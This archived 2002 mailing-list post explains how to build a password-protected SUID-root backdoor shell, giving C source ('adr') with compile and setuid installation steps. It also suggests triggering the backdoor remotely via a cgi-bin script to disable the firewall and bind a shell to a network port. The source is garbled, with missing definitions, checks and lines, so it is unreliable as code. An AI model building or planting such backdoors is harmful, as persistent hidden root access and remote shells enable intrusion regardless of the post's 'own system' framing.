Re: No Root Shell with SUID /bin/bash

From: Peter Pan (
Date: 04/20/02

Date: Sat, 20 Apr 2002 10:22:41 +0200 (CEST)
From: Peter Pan <>

if you intend to place a backdoor root shell for
"personal use" in your own system (because an attacker
changed the root password) then you should write a
little program with SUID root rights, executable for
every user, but demanding a password before opening a
root shell.
Passwords should not be readable in plain text (doh!),
so use MD5 hashes or so for authentication.
A small C program which does exactly this can be found
below. It should compile on most linuxes with openssl.
If all users are logged out of your system you can
modify the program and think of a way to execute it
remotely (maybe via a cgi-bin file of your web server;
this service is rarely shut down by an attacker). Then
fight back with their own weapons: instead of running
a system("/bin/sh") execute system()-commands to shut
down the firewall and bind an authenticating shell to
some port.

/* "adr" root backdoor in own system.

   by radiodrinker at yahoo dot de

   1. compile:
      gcc adr.c -o adr -lssl
   2. As root:
      chown root adr; chmod u+s adr; chmod go+rx adr
   3. run adr. enter password of your choice.
   4. system won't let you in. copy generated md5 hash
off the screen.
   5. paste md5 hash to identifier "correctMD5hash"
(see below).
   6. repeat steps 1 and 2.
   7. login as non-root user. run adr. enter correct
   8. have fun.
   9. opt: move the file to

#include <stdio.h>
#include <openssl/md5.h>


void hexToString(char* sourceaddress, char*
destaddress, int length){
  char temp[20];
  int i;
  for(i=0; i<length; i++){
    unsigned char current=sourceaddress[i];
    sprintf(temp, "%x", current);
    strcat(destaddress, temp);

int main(void){
  int olduid=500;
  char phrase[16384];
  char md5sum[16384];
  char md5string[16384];


    printf("must be suid root.\n");
  } else {

    printf("Banner something V2.17\n");
    printf("Enter pass phrase:");
    fgets(phrase, sizeof(phrase)-1, stdin);

    MD5(phrase, strlen(phrase), md5sum);
    hexToString(md5sum, md5string, 16);

    if(strncmp(md5string, correctMD5hash,
      // then it does not match.
      printf("md5 value of pass phrase is:
%s\nSorry.\n", md5string);
      printf("Welcome back. Have fun.\n");
  return 0;


Gesendet von Yahoo! Mail -
Sie brauchen mehr Speicher für Ihre E-Mails? -

Relevant Pages

  • Re: AppArmor FAQ
    ... but it is a model that works in the limited http environment ... AppArmor was designed to do, and without specifics, this is just ... Exploited httpd is root shell. ...
  • Re: Single User Mode and Root
    ... M> Ian Northeast wrote: ... M>>>> so that single user mode doesn't have root privledges. ... M> need root shell and they're known. ... You cant protect a machine from people with physical access. ...
  • Re: bash as login shell
    ... but no explicit choice for bash occurs in the drop down list ... |>>> Account Manager. ... |>>For the root user, yes. ... |> and found the root shell had been changed to csh. ...
  • Re: questions regarding sh shell
    ... root uses csh on my FreeBSD 5.4-STABLE. ... doing things the way I am used to under bash. ... My systems have csh as root shell, ...
  • [Full-Disclosure] Local root vuln in kpopup
    ... and many other places if you search kpopup on google. ... installed suid root it also comes as part of FreeBSD ... int main ... echo "NOW HERE IS YOUR ROOT SHELL" ...